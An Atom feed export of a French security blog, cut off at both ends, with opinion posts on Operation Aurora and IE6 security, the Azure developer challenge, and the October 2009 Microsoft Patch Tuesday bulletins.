matin (je vous donne la version Twitter car je ne crois pas que la &lt;em&gt;newsletter&lt;/em&gt; soit archivée en ligne).&lt;br /&gt;&lt;br /&gt;Et pourtant, &lt;a href="http://www.blackberryforums.com.au/forums/blackberry-announcements/893-rim-analysis-buffer-overrun-decompression-algorithm.html"&gt;il y a 3 ans&lt;/a&gt; déjà ...&lt;br /&gt;&lt;br /&gt;PS. J'en profite pour signaler que j'ai ouvert il y a quelques temps un &lt;a href="http://microfail.blogspot.com/"&gt;Fail Blog&lt;/a&gt; personnel ... pour ce genre d'anecdotes qui ne justifient pas un billet complet.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-3564333728972795619?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/3564333728972795619/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=3564333728972795619' title='7 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3564333728972795619'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3564333728972795619'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2010/01/interlude-recreationnel.html' title='Interlude récréationnel'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-3819931640717054180</id><published>2010-01-21T09:00:00.001+01:00</published><updated>2010-01-21T11:26:00.615+01:00</updated><title type='text'>Aurora FAIL</title><content type='html'>Je ne vais pas faire l'insulte à mes lecteurs de revenir sur le déroulement de ce qu'il est convenu d'appeler "&lt;a href="http://news.google.fr/news/search?aq=f&amp;amp;pz=1&amp;amp;cf=all&amp;amp;ned=fr&amp;amp;hl=fr&amp;amp;q=aurora"&gt;l'opération Aurora&lt;/a&gt;".&lt;br /&gt;&lt;br /&gt;A peu près tous les vendeurs d'antivirus, de HIPS et de NIPS vous ont déjà sensibilisés au fait que leur produit aurait permis de bloquer cette attaque (sauf que les &lt;a href="http://www.washingtonpost.com/wp-dyn/content/article/2010/01/13/AR2010011300359.html?hpid=topnews"&gt;30+ entreprises concernées&lt;/a&gt; - dont Symantec -disposaient déjà probablement de nombreux produits de sécurité actifs sur leur réseau, mais c'est un autre débat).&lt;br /&gt;&lt;br /&gt;Au final, toute cette histoire aura été l'occasion d'un &lt;a href="http://fr.wikipedia.org/wiki/FUD"&gt;FUD&lt;/a&gt; considérable sur Internet, et d'une superbe opération de communication de la part de Google qui se pose en &lt;a href="http://www.ecrans.fr/Google-Chine,8940.html"&gt;champion de la liberté&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;FAIL#1&lt;/strong&gt; Ce qui me choque le plus, c'est qu'une société aussi innovante que Google soit à la merci d'une faille dans Internet Explorer 6. Moi qui pensait qu'ils utilisaient &lt;a href="http://www.google.fr/chrome"&gt;Chrome&lt;/a&gt; ;)&lt;br /&gt;&lt;br /&gt;Compte-tenu de &lt;a href="http://secunia.com/advisories/product/11/"&gt;l'historique de sécurité d'Internet Explorer 6&lt;/a&gt;, et du nombre de failles "annexes" qui peuvent être déclenchées automatiquement par le biais de ce navigateur (tous les ActiveX et les &lt;a href="http://www.microsoft.com/technet/security/advisory/954157.mspx"&gt;codecs&lt;/a&gt; installés localement,&amp;nbsp;ainsi que&amp;nbsp;Acrobat Reader, Flash, ShockWave, QuickTime, RealPlayer ...), la conclusion évidente est que surfer sur Internet avec IE6 sans protection (ex. &lt;a href="http://www.sandboxie.com/"&gt;SandBoxIE&lt;/a&gt; ou au minimum &lt;a href="http://msdn.microsoft.com/fr-fr/library/ms972827.aspx"&gt;DropMyRights&lt;/a&gt;) est juste parfait pour attraper le SIDA, la syphilis&amp;nbsp;et la variole&amp;nbsp;de l'informatique.&lt;br /&gt;&lt;br /&gt;Toute entreprise dont la sécurité interne dépend directement de la sécurité d'IE6 est condamnée à l'infection. Avec le nombre de gens brillants en charge de la sécurité chez Google, j'aurais cru cette vérité comme évidente pour eux.&lt;br /&gt;&lt;br /&gt;Personnellement, je ne sors plus qu'avec FireFox + &lt;a href="https://addons.mozilla.org/fr/firefox/addon/722"&gt;NoScript&lt;/a&gt;, et encore je me méfie de la surface d'attaque offerte par le plugin NoScript lui-même ...&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;FAIL#2&lt;/strong&gt; "Les attaques proviennent de la Chine".&lt;br /&gt;&lt;br /&gt;Dans le cas de Google, il est fort probable qu'il s'agisse d'un &lt;em&gt;&lt;a href="http://www.telegraph.co.uk/technology/google/7019536/Google-China-hacks-a-possible-inside-job.html"&gt;insider job&lt;/a&gt;&lt;/em&gt; depuis leur bureau en Chine. Toute personne qui a ouvert un bureau ou une usine en Chine sait que ce scénario est très crédible.&lt;br /&gt;&lt;br /&gt;Mais quand on regarde le &lt;a href="http://www.cyberwart.com/blog/2010/01/19/idle-speculation-on-auroras/"&gt;schéma global de toutes les attaques&lt;/a&gt;, très peu d'adresses IP sont effectivement situées en Chine. N'importe qui aurait pu faire l'acquisition de cette faille IE (comme il &lt;a href="http://seclists.org/fulldisclosure/2009/Dec/256"&gt;s'en vend plein sur Internet&lt;/a&gt;). Et la "sophistication" des attaques reste à démontrer ... car après tout il s'agit juste de déposer des exécutables sur le système de la victime, utilisant &lt;a href="http://www.avertlabs.com/research/blog/index.php/2010/01/18/an-insight-into-the-aurora-communication-protocol/"&gt;un protocole basé sur le chiffrement "XOR"&lt;/a&gt; avec une clé de 1 octet. N'importe quel pare-feu personnel devrait être capable de détecter&amp;nbsp;ce type d'activité anormale.&lt;br /&gt;&lt;br /&gt;Si vous êtes paranoïaque, il ne vous coûtera pas grand'chose de &lt;a href="http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0226.html"&gt;bloquer toutes les adresses IP chinoises&lt;/a&gt; sur votre réseau. Ainsi que tous les domaines de la forme "[0-9]+.{org|.net}" (par exemple, les domaines chinois&amp;nbsp;&lt;a href="http://www.mywot.com/en/scorecard/8800.org"&gt;8800.org&lt;/a&gt; et &lt;a href="http://www.mywot.com/en/scorecard/3322.net"&gt;3322.net&lt;/a&gt; étant exclusivement connus pour héberger du malware).&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;FAIL#3&lt;/strong&gt; &lt;em&gt;Data Execution Prevention&lt;/em&gt; (DEP)&lt;br /&gt;&lt;br /&gt;Tous les problèmes de sécurité ont été résolus en même temps qu'ils sont apparus. Mais l'industrie s'est tout de suite confrontée aux problèmes, tandis que les solutions ont été beaucoup plus longues à faire leur chemin.&lt;br /&gt;&lt;br /&gt;Ainsi au début des années 2000, le problème de la non-exécution de code dans les zones de données&amp;nbsp;a été&amp;nbsp;parfaitement résolu par &lt;a href="http://fr.wikipedia.org/wiki/PaX"&gt;PaX&lt;/a&gt;, mais ce patch n'a jamais été intégré dans le noyau Linux pour des histoires personnelles entre Linus et la PaX team.&lt;br /&gt;&lt;br /&gt;Parmi les conditions de mise en oeuvre de la non-exécutabilité des données (DEP sous Windows), il est évident depuis le début que le positionnement des exécutables en mémoire doit également être aléatoire (ASLR), sinon il est possible d'utiliser une technique connue sous le nom de &lt;em&gt;retour dans la libc&lt;/em&gt;.&lt;br /&gt;&lt;br /&gt;Bref, &lt;a href="http://blogs.technet.com/srd/archive/2010/01/20/reports-of-dep-being-bypassed.aspx"&gt;tout le monde a spéculé sur l'efficacité de DEP&lt;/a&gt; pour protéger Internet Explorer. Outre le fait que les versions 6 et 7 n'utilisent pas DEP par défaut, cette protection est de toute façon inefficace sur Windows XP puisque le placement en mémoire des exécutables est prédictible (sauf à utiliser &lt;a href="http://www.codeplex.com/wehntrust"&gt;WehnTrust&lt;/a&gt;).&lt;br /&gt;&lt;br /&gt;Le plus gênant dans cette affaire, ça n'est pas le fait que DEP puisse être contourné sous certaines conditions. C'est que personne n'a pris la peine de tester avec &lt;a href="http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html"&gt;l'exploit public&lt;/a&gt; avant d'écrire tout et n'importe quoi.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;FAIL#4&lt;/strong&gt; &lt;em&gt;Secure Development Lifecycle&lt;/em&gt; (SDL)&lt;br /&gt;&lt;br /&gt;Ce qui me semble extrêmement intéressant dans les dernières failles Internet Explorer et Acrobat Reader, c'est que les méthodes de développement sécurisé proposées par Microsoft (SDL) n'auraient pas permis de les éviter.&lt;br /&gt;&lt;br /&gt;En effet, le SDL vise (entre autres) à bannir les API "dangereuses" (de type &lt;em&gt;strcat()&lt;/em&gt; ou &lt;em&gt;sprintf()&lt;/em&gt;) - c'est-à-dire à lutter contre les &lt;em&gt;buffer overflows&lt;/em&gt;.&lt;br /&gt;&lt;br /&gt;Or les failles dont on parle sont de type &lt;em&gt;use after free&lt;/em&gt;. Par exemple &lt;a href="http://securitylabs.websense.com/content/Blogs/3530.aspx"&gt;dans le cas de la faille IE&lt;/a&gt;, celle-ci se résume à:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Ajouter&amp;nbsp;un évènement sur un objet du DOM&lt;/li&gt;&lt;li&gt;Supprimer l'objet en accédant au DOM via JavaScript&lt;/li&gt;&lt;li&gt;Attendre que l'évènement soit invoqué&lt;/li&gt;&lt;/ol&gt;Trivial, n'est-il pas ? Pourtant ces failles sont extrêmement difficiles à détecter, aussi bien en analyse statique qu'en analyse dynamique (&lt;em&gt;fuzzing&lt;/em&gt;) que par une revue de code manuelle, surtout sur du code massivement multi-threadé.&lt;br /&gt;&lt;br /&gt;On peut donc suspecter que le &lt;em&gt;use after free&lt;/em&gt; va encore faire parler de lui ... et pas seulement dans Internet Explorer 6 !&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;L'affaire "Aurora" ne change rien à mes conclusions antérieures. Si vous avez des vrais problèmes de sécurité, prenez conseil auprès de vrais spécialistes. 95% de l'information disponible sur Internet est partielle, fausse ou non vérifiée.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-3819931640717054180?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/3819931640717054180/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=3819931640717054180' title='8 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3819931640717054180'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3819931640717054180'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2010/01/aurora-fail.html' title='Aurora FAIL'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-1377108114900239095</id><published>2009-12-21T13:30:00.000+01:00</published><updated>2009-12-21T13:30:15.377+01:00</updated><title type='text'>Dissonance cognitive</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: left;"&gt;Ca y est, j'ai terminé le &lt;a href="http://challengeazure.developpez.com/"&gt;Challenge Azure&lt;/a&gt; (je ne suis pas 1er car il a fallu un peu de temps pour brute-forcer le QCM :)&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://newsoft.dyndns.org/blog/azure.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" ps="true" src="http://newsoft.dyndns.org/blog/azure.png" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;La mauvaise nouvelle pour vous, c'est que je suis maintenant officiellement autorisé à vous parler de &lt;em&gt;Cloud Computing&lt;/em&gt; puisque j'ai envoyé mes applications "&lt;em&gt;In The Cloud&lt;/em&gt;" :)&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;Mais pour être honnête, je n'ai jamais rencontré un challenge aussi grisant depuis la&amp;nbsp;disparition de &lt;a href="http://www.challenge-securitech.com/"&gt;SecuriTech&lt;/a&gt;.&amp;nbsp;Il existe plein de challenges &lt;a href="http://intruded.net/"&gt;passionnants et intelligents&lt;/a&gt; sur Internet, mais&amp;nbsp;rien à faire: le&amp;nbsp;temps limité ajoute un sentiment d'urgence très excitant.&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;Et le &lt;a href="http://challengeazure.developpez.com/"&gt;Challenge Azure&lt;/a&gt; est vraiment unique. Pourquoi ? Parce qu'il est facile de trouver la solution à tous les autres challenges publics. Soit parce qu'il existe des &lt;a href="http://whine.fr/tag/intruded/"&gt;&lt;em&gt;spoilers&lt;/em&gt;&lt;/a&gt;, soit parce que ce sont toujours les mêmes failles qui reviennent en boucle: &lt;em&gt;buffer overflow&lt;/em&gt;, fichier &lt;em&gt;setuid&lt;/em&gt; gérant mal ses privilèges, etc.&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;Alors que pour le Challenge Azure, il n'existe aucune solution. Personne ne peut vous aider, car personne ne sait comment ça marche. La documentation disponible sur Internet est fausse, car elle ne s'applique pas à la version &lt;a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=413e88f8-5966-4a83-b309-53b7b77edf78&amp;amp;displaylang=en"&gt;CTP de novembre 2009&lt;/a&gt;. Bien que le challenge consiste simplement à corriger du code déjà écrit par des gens de Microsoft France, vous pouvez rester des heures à contempler une &lt;a href="http://msdn.microsoft.com/en-us/library/bb397687.aspx"&gt;lambda-fonction&lt;/a&gt; C# destinée à requêter un &lt;em&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/dd135733.aspx"&gt;blob&lt;/a&gt;&lt;/em&gt; dans votre &lt;em&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/dd179355.aspx"&gt;storage&lt;/a&gt;&lt;/em&gt; sans comprendre une ligne de ce qui est écrit.&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;Et là, la vérité m'est apparue nue. Depuis 10 ans que je pratique la sécurité informatique en entreprise, je n'ai jamais rencontré&amp;nbsp;un développeur (sauf des &lt;em&gt;designers&lt;/em&gt; d'IHM en Java, mais je ne pense pas que ça compte). J'en ai pourtant audité des applications, j'en ai&amp;nbsp;prodigué du conseil pour améliorer la sécurité&amp;nbsp;des développements (comme compiler avec &lt;a href="http://msdn.microsoft.com/en-us/library/8dbf701c(VS.80).aspx"&gt;/GS&lt;/a&gt;, &lt;a href="http://msdn.microsoft.com/en-us/library/ms235442(VS.80).aspx"&gt;/NXCOMPAT&lt;/a&gt; et &lt;a href="http://msdn.microsoft.com/en-us/library/9a89h429(VS.80).aspx"&gt;/SAFESEH&lt;/a&gt;)&amp;nbsp;... mais même dans les réunions de &lt;em&gt;debriefing&lt;/em&gt; post-audit&amp;nbsp;les plus houleuses, je n'ai jamais eu en face de moi que des intégrateurs ou des technico-commerciaux ...&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;Les entreprises dont le coeur de métier n'est pas l'IT n'embauchent pas de développeurs. Les seuls "développeurs" qu'on y recontrent sont des prestataires&amp;nbsp;liés aux gros&amp;nbsp;progiciels internes (comme SAP ou SharePoint). Ce sont souvent des consultants de l'éditeur ou de sociétés aux intérêts très liées. Le reste des applications sont achetées sur étagère, jamais développées en interne.&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;Et dans le domaine de l'application commerciale, il y a deux cas: soit la &lt;em&gt;start-up&lt;/em&gt; avec quelques développeurs, parfois motivés, mais jamais très nombreux, et rarement sensibilisés à la sécurité. Soit la société qui a crû suffisamment pour sous-traiter ses développements en Roumanie, en Inde, au Vietnam, ou n'importe où ailleurs (mais toujours à un endroit où il sera impossible de&amp;nbsp;communiquer avec&amp;nbsp;les développeurs).&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;Alors après avoir pratiqué un peu sur la plateforme Azure, je souris intérieurement en pensant à la probabilité pour que ma société&amp;nbsp;soit un jour cliente directe de cette solution (mais je pense que cela s'étend à d'autres sociétés françaises de la même envergure). Il est déjà probablement impossible de trouver un employé (pas un sous-traitant)&amp;nbsp;qui sache écrire une ligne de C#. Alors de là à maitriser les subtilités du framework&amp;nbsp;4.0 ou de &lt;a href="http://msdn.microsoft.com/en-us/netframework/aa904594.aspx"&gt;LINQ&lt;/a&gt;, c'est de la science fiction. Bien sûr il est également possible de développer du &lt;a href="http://phpazure.codeplex.com/"&gt;code PHP&lt;/a&gt; avec &lt;a href="http://www.windowsazure4e.org/"&gt;Eclipse&lt;/a&gt; pour la plateforme Azure, mais là&amp;nbsp;on en est&amp;nbsp;quasiment au stade de la manipulation génétique :)&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;Petit détail: le SDK Azure ne s'installe que sur Windows Vista et ultérieur. Rien que ce pré-requis est rédhibitoire quand on sait que l'écrasante majorité des postes de travail reste sous Windows XP, le SP2 n'ayant parfois pas été installé par peur des incompatibilités.&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;La seule voie par laquelle le &lt;em&gt;Cloud&lt;/em&gt;&amp;nbsp;a une chance de&amp;nbsp;gagner les entreprises, c'est par la sous-traitance. Après tout, mon employeur m'a bien obligé à enregistrer mon numéro de carte bleue sur le site Web d'une société tierce en charge de tous les voyages et de toutes les notes de frais. Peut-être fait-elle déjà appel au &lt;em&gt;Cloud&lt;/em&gt; ? Qui s'en préoccupe de toute façon ?&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="left" class="separator" style="clear: both;"&gt;PS. Pourquoi le &lt;em&gt;Cloud&lt;/em&gt; est-il l'avenir de l'informatique ? IDC pense qu'il n'y aura &lt;a href="http://www.developpez.net/forums/d852324/club-professionnels-informatique/actualites/idc-affirme-windows-7-sera-dernier-windows/"&gt;pas de successeur à Windows Seven&lt;/a&gt;. Vinton Cerf pense qu'en 2012, il y aura plus de téléphones connectés à Internet que d'ordinateurs. Il me semble que tout cela fait du sens: l'informatique telle que nous la connaissons va disparaitre. Les services informatiques sont déjà en train de disparaitre d'ailleurs ...&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-1377108114900239095?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/1377108114900239095/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=1377108114900239095' title='10 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1377108114900239095'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1377108114900239095'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/12/dissonance-cognitive.html' title='Dissonance cognitive'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-6745563175583976148</id><published>2009-10-17T10:00:00.003+02:00</published><updated>2009-10-20T10:33:56.334+02:00</updated><title type='text'>Le Monstre</title><content type='html'>Et oui, le &lt;em&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms09-oct.mspx"&gt;Patch Tuesday&lt;/a&gt;&lt;/em&gt; d'octobre est tout simplement ... monstrueux ! Avec 13 bulletins corrigeant 33 failles, c'est &lt;a href="http://blogs.technet.com/msrc/archive/2009/10/13/october-2009-security-bulletin-release.aspx"&gt;un record&lt;/a&gt; dans l'histoire des bulletins de sécurité Microsoft.&lt;br /&gt;&lt;br /&gt;Il faut dire que traditionnellement, avant chaque lancement d'une nouvelle version de Windows, Microsoft vide son placard des failles accumulées. Et Windows Seven sort le &lt;a href="http://www.pcinpact.com/actu/news/53165-windows-cafe-paris-microsoft.htm"&gt;22 octobre&lt;/a&gt; ...&lt;br /&gt;&lt;br /&gt;Impossible de rentrer dans les détails techniques de tous ces correctifs en un seul billet. Je me contenterai de donner quelques remarques ou anecdotes concernant ces bulletins.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx"&gt;MS09-050&lt;/a&gt; corrige 3 failles dans l'implémentation du protocole SMBv2: celle trouvée par &lt;a href="http://g-laurent.blogspot.com/"&gt;Laurent Gaffié&lt;/a&gt; (qui n'est pas crédité, en châtiment de son &lt;em&gt;irresponsible disclosure&lt;/em&gt;), et une autre faille exploitable trouvée par &lt;a href="http://www.msuiche.net/"&gt;Matthieu Suiche&lt;/a&gt; (l'un de mes anciens stagiaires :). Notons que ces deux français sont &lt;a href="http://news0ft.blogspot.com/2009/07/lechec-de-la-securite-francaise.html"&gt;expatriés&lt;/a&gt;: l'un au Canada, l'autre aux Pays-Bas.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms09-051.mspx"&gt;MS09-051&lt;/a&gt; corrige des failles dans un obscur codec de Windows Media, optimisé pour le traitement de la voix. Mais ce bulletin est symptomatique du fait qu'il faut lire les bulletins, et pas seulement appliquer les correctifs. En effet, ce codec n'est pas présent par défaut dans Windows Media Player 6.4 sur Windows 2000, mais a pu être installé par le mécanisme de recherche automatique des codecs en ligne. Si c'est le cas, &lt;a href="http://blogs.technet.com/srd/archive/2009/10/12/ms09-051-a-note-on-the-affected-platforms.aspx"&gt;une opération manuelle est requise sur le poste&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/MS09-053.mspx"&gt;MS09-053&lt;/a&gt; corrige des failles (déjà connues) dans le serveur FTP de Microsoft. Bizarrement, Kingcope est crédité alors que la publication de ces failles a été &lt;a href="http://archives.neohapsis.com/archives/fulldisclosure/2009-08/0444.html"&gt;tout&lt;/a&gt; sauf &lt;a href="http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"&gt;responsable&lt;/a&gt; !&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/MS09-054.mspx"&gt;MS09-054&lt;/a&gt; est un correctif cumulatif pour Internet Explorer. L'une des failles est exploitable par le biais de la technologie &lt;a href="http://www.xbap.org/"&gt;XBAP&lt;/a&gt;: il ne s'agit rien de moins que de créer des applications complètes (en code managé) qui vont être téléchargées et exécutées dans le navigateur ! Un remplacement des ActiveX et un concurrent pour la technologie &lt;a href="http://code.google.com/p/nativeclient/"&gt;Native Client&lt;/a&gt; de Google.&lt;br /&gt;&lt;br /&gt;Là où ça devient fort, c'est que l'installation du Framework .NET 3.5 (pré-requis à l'exécution d'applications XBAP) va automatiquement installer une extension Firefox (si ce navigateur est présent). Donc même Firefox sur Windows est &lt;a href="http://blogs.technet.com/srd/archive/2009/10/12/ms09-054.aspx"&gt;vulnérable à cette faille&lt;/a&gt; ! Du coup, la fondation Mozilla a &lt;a href="http://blog.mozilla.com/security/2009/10/16/net-framework-assistant-blocked-to-disarm-security-vulnerability/"&gt;désactivé cette extension&lt;/a&gt; par le biais des mises à jour automatiques de &lt;em&gt;plugins&lt;/em&gt; ... Est-ce que Microsoft va réactiver le &lt;em&gt;plugin&lt;/em&gt; par le biais de Windows Update ?&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/MS09-056.mspx"&gt;MS09-056&lt;/a&gt; corrige deux failles dans la CryptoAPI (le pendant Windows de la libssl), permettant de tricher sur les propriétés d'un certificat. Manque de chance, ce correctif n'est &lt;a href="http://support.microsoft.com/kb/974571"&gt;pas compatible&lt;/a&gt; avec le produit &lt;a href="http://office.microsoft.com/en-us/communicationsserver/default.aspx"&gt;Microsoft OCS&lt;/a&gt; - un produit de communication unifiée très en vogue actuellement: il provoque l'invalidation des clés de licence ...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/MS09-061.mspx"&gt;MS09-061&lt;/a&gt; permet basiquement d'exécuter du code "natif" depuis du code "managé", même si celui-ci s'exécute avec les droits minimum. Il s'agit d'une évasion de machine virtuelle comme &lt;a href="http://blog.cr0.org/2009/05/write-once-own-everyone.html"&gt;Java en a connu&lt;/a&gt; par le passé. Dès lors que vous exécutez du code "managé" depuis une source non sûre, vous êtes exposés: applications XBAP, hébergement ASP.NET, mais aussi &lt;em&gt;plugin&lt;/em&gt; SilverLight (le concurrent Microsoft d'Adobe Flash Player). Ce dernier est un produit important dans le &lt;em&gt;portfolio&lt;/em&gt; Microsoft ...&lt;br /&gt;&lt;br /&gt;L'auteur de l'un de ces bogues (Jeroen Frijters) n'en est pas à son coup d'essai. Pour la petite histoire, il est &lt;em&gt;leader&lt;/em&gt; d'un projet Open Source visant à implémenter une machine Java en .NET (le projet &lt;a href="http://www.ikvm.net/"&gt;IKVM&lt;/a&gt;). Dans le cadre de ce projet, il a déjà remonté plusieurs bogues critiques à Microsoft, qui ont tous été &lt;a href="http://weblog.ikvm.net/CommentView.aspx?guid=c7e7d775-47e1-4525-9652-4ceea7a4a0d8"&gt;corrigés silencieusement&lt;/a&gt;. Du coup, il avait décidé d'appliquer ce qu'il appelle la "&lt;em&gt;no Microsoft bug filing policy&lt;/em&gt;". Il faut croire que Microsoft s'en est ému.&lt;br /&gt;&lt;br /&gt;PS. Si vous vous demandez à quoi peut bien servir une machine Java en .NET, sachez qu'il en existe déjà une, fournie par Microsoft: il s'agit de la technologie J#. C'est très pratique lorsque Microsoft fait l'acquisition d'applications entièrement écrites en Java ;) Seul problème: cette technologie a été développée à &lt;a href="http://en.wikipedia.org/wiki/J_sharp"&gt;Hyderabad&lt;/a&gt; et s'avère ni fiable (d'après Jeroen Frijters), ni pérenne (d'après Wikipedia).&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms09-062.mspx"&gt;MS09-062&lt;/a&gt; corrige un paquet de failles dans GDI+. Pour mémoire, GDI+ est la librairie qui traite tous les formats d'image sous Windows - l'impact potentiel de ces failles est donc énorme, compte-tenu du nombre de vecteurs d'attaque. Souvenez-vous, déjà en 2004 certains avaient prédit le "&lt;em&gt;Big One&lt;/em&gt;" avec la faille JPEG dans cette même librairie (&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms04-028.mspx"&gt;MS04-028&lt;/a&gt;).&lt;br /&gt;&lt;br /&gt;Comme facteur aggravant, il faut noter que le code GDI+ est disponible sous forme de librairie dans les outils de développement Microsoft. Il est donc possible de lier statiquement ce code à toute application développée avec Visual Studio. Conclusion: malgré la mise à disposition par Microsoft (à l'époque) d'un outil de recherche de motifs dans le code compilé, il est impossible de venir entièrement à bout de cette faille dans toutes les applications tierces.&lt;br /&gt;&lt;br /&gt;Notons que &lt;a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2504"&gt;l'une de ces failles&lt;/a&gt; permet d'exécuter du code "natif" depuis du code "managé" (évasion du Framework .NET). Java a connu &lt;a href="http://www.sunsolve.sun.com/search/document.do?assetkey=1-26-102760-1"&gt;les mêmes&lt;/a&gt;: il s'agit d'un risque rampant, sauf à réécrire toutes les librairies graphiques en code managé.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Notons aussi que Thomas Garnier (SkyRecon) est crédité pour la découverte de l'une de ces failles. Sachant qu'il a quitté SkyRecon autour du mois de février 2009 (pour aller chez Microsoft), cela donne une idée du délai de correction de cette faille ... La faille dans les &lt;a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=829"&gt;graphiques Office&lt;/a&gt; a été vendue à iDefense en avril 2008, et celle sur le &lt;a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=828"&gt;format 